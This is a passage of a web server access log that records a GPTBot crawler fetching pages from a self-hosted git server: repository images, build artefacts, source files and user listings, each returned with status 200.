+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/users?q=&sort=newest" [Client 74.7.227.38] [Length 5463] [Gzip 2.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/users" -[17/Feb/2026:17:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/users?q=&sort=oldest" [Client 74.7.227.38] [Length 5472] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/users" -[17/Feb/2026:17:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:17:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11986] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" -[17/Feb/2026:17:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10311] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10266] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 74.7.227.38] [Length 11577] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs?display=source" [Client 74.7.227.38] [Length 14184] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:17:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10973] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10965] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:17:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 14961] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33371] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:17:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:17:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:17:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13845] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13811] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11003] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:17:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20165] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43101] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] 